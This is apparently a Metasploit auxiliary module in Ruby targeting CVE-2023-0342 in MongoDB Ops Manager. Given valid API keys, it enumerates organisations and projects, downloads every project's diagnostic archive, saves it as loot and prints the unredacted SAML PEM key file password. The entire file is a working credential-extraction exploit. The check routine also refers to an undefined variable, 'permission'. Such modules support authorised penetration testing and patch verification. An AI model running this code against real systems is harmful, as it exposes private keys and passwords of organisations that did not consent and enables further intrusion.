##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'digest/md5'
require 'zlib'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MongoDB Ops Manager Diagnostic Archive Sensitive Information Retriever',
        'Description' => %q{
          MongoDB Ops Manager Diagnostics Archive does not redact SAML SSL Pem Key File Password
          field (mms.saml.ssl.PEMKeyFilePassword) within app settings. Archives do not include
          the PEM files themselves. This module extracts that unredacted password and stores
          the diagnostic archive for additional manual review.

          This issue affects MongoDB Ops Manager v5.0 prior to 5.0.21 and
          MongoDB Ops Manager v6.0 prior to 6.0.12.

          API credentials with the role of GLOBAL_MONITORING_ADMIN or GLOBAL_OWNER are required.

          Successfully tested against MongoDB Ops Manager v6.0.11.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
        ],
        'References' => [
          [ 'URL', 'https://github.com/advisories/GHSA-xqvf-v5jg-pxc2'],
          [ 'URL', 'https://www.mongodb.com/docs/ops-manager/current/reference/configuration/#mongodb-setting-mms.https.PEMKeyFilePassword'],
          [ 'CVE', '2023-0342']
        ],
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        'DisclosureDate' => '2023-06-09',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )
    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('API_PUBKEY', [ true, 'Public Key to login with for API requests', '']),
        OptString.new('API_PRIVKEY', [ true, 'Password to login with for API requests', '']),
        OptString.new('TARGETURI', [ true, 'The URI of MongoDB Ops Manager', '/'])
      ]
    )
  end

  def check
    url = normalize_uri(target_uri.path, 'api', 'public', 'v1.0')
    auth_response = digest_auth(url)
    # https://www.mongodb.com/docs/ops-manager/current/tutorial/update-om-with-latest-version-manifest-with-api/
    res = send_request_cgi(
      'uri' => url,
      'headers' => {
        'accept' => 'application/json',
        'authorization' => auth_response
      }
    )

    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
    return Exploit::CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200

    roles = res.get_json_document.dig('apiKey', 'roles')
    return Exploit::CheckCode::Unknown("#{peer} - Unable to retrieve roles") if roles.nil?

    roles = roles.map { |hash| hash['roleName'] }
    return Exploit::CheckCode::Safe("API key requires GLOBAL_MONITORING_ADMIN or GLOBAL_OWNER permissions. Current permissions: #{permission.join(', ')}") unless roles.include?('GLOBAL_MONITORING_ADMIN') || roles.include?('GLOBAL_OWNER')

    Exploit::CheckCode::Detected('API key has correct roles but version detection not possible')
  end

  def username
    datastore['API_PUBKEY']
  end

  def password
    datastore['API_PRIVKEY']
  end

  def digest_auth(url)
    # get a 401 so we get the WWW-Authenticate header
    res = send_request_cgi(
      'uri' => url,
      'headers' => {
        'accept' => 'application/json'
      }
    )
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Basic auth not enabled, but is expected") unless res.code == 401

    # Define the regular expression pattern to capture key-value pairs
    pattern = /(\w+)="(.*?)"/

    parsed_hash = {}
    res.headers['WWW-Authenticate'].scan(pattern) do |key, value|
      parsed_hash[key] = value
    end

    parsed_hash['nc'] = '00000001'
    parsed_hash['cnonce'] = '0a4f113b' # XXX randomize?

    # Calculate the response
    ha1 = Digest::MD5.hexdigest("#{username}:#{parsed_hash['realm']}:#{password}")
    ha2 = Digest::MD5.hexdigest("GET:#{url}")
    parsed_hash['response'] = Digest::MD5.hexdigest("#{ha1}:#{parsed_hash['nonce']}:#{parsed_hash['nc']}:#{parsed_hash['cnonce']}:#{parsed_hash['qop']}:#{ha2}")

    %(Digest username="#{username}", realm="#{parsed_hash['realm']}", nonce="#{parsed_hash['nonce']}", uri="#{url}", cnonce="#{parsed_hash['cnonce']}", nc=#{parsed_hash['nc']}, qop=auth, response="#{parsed_hash['response']}", algorithm=MD5)
  end

  def get_orgs
    url = normalize_uri(target_uri.path, 'api', 'public', 'v1.0', 'orgs')
    auth_response = digest_auth(url)
    # https://www.mongodb.com/docs/ops-manager/v6.0/reference/api/organizations/organization-get-all/
    res = send_request_cgi(
      'uri' => url,
      'headers' => {
        'accept' => 'application/json',
        'authorization' => auth_response
      }
    )
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials or not enough permissions (response code: #{res.code})") if res.code == 401
    res.get_json_document
  end

  def get_projects(org)
    url = normalize_uri(target_uri.path, 'api', 'public', 'v1.0', 'orgs', org, 'groups')
    auth_response = digest_auth(url)
    # https://www.mongodb.com/docs/ops-manager/current/reference/api/organizations/organization-get-all-projects/
    res = send_request_cgi(
      'uri' => url,
      'ctype' => 'application/json',
      'headers' => {
        'accept' => 'application/json',
        'authorization' => auth_response
      }
    )
    return [] if res.nil? || res.code == 401

    res.get_json_document['results']
  end

  def get_diagnostic_archive(project)
    url = normalize_uri(target_uri.path, 'api', 'public', 'v1.0', 'groups', project, 'diagnostics')
    auth_response = digest_auth(url)
    # https://www.mongodb.com/docs/ops-manager/current/reference/api/diagnostics/get-project-diagnostic-archive/
    res = send_request_cgi(
      'uri' => url,
      'ctype' => 'application/json',
      'headers' => {
        'accept' => 'application/gzip',
        'authorization' => auth_response
      },
      'vars_get' => { 'pretty' => 'true' }
    )
    return unless res&.code == 200

    loot_location = store_loot('mongodb.ops_manager.project_diagnostics', 'application/gzip', rhost, res.body, "project_diagnostics.#{project}.tar.gz", "Project diagnostics for MongoDB Project #{project}")
    print_good("Stored Project Diagnostics files to #{loot_location}")
    vprint_status('    Opening project_diagnostics.tar.gz')
    gz_reader = Zlib::GzipReader.new(StringIO.new(res.body))
    tar_reader = Rex::Tar::Reader.new(gz_reader)
    tar_reader.each do |entry|
      next unless entry.full_name == 'global/appSettings.json'

      json_data = JSON.parse(entry.read)
      next unless json_data.key? 'instanceOverrides'

      json_data['instanceOverrides'].each do |key, value|
        next unless value.key? 'mms.saml.ssl.PEMKeyFilePassword'

        if value['mms.saml.ssl.PEMKeyFilePassword'] == '<redacted>'
          fail_with(Failure::NotVulnerable, 'Value is <redacted>, server is patched.')
        else
          print_good("Found #{key}'s unredacted mms.saml.ssl.PEMKeyFilePassword: #{value['mms.saml.ssl.PEMKeyFilePassword']}")
        end
      end
    end
    tar_reader.close
    gz_reader.close
  end

  def run
    vprint_status('Checking for orgs')
    orgs = get_orgs
    orgs['results'].each do |org|
      org = org['id']
      vprint_status("Looking for projects in org #{org}")
      projects = get_projects(org)
      projects.each do |project|
        vprint_good("  Found project: #{project['name']} (#{project['id']})")
        get_diagnostic_archive(project['id'])
      end
    end
  end
end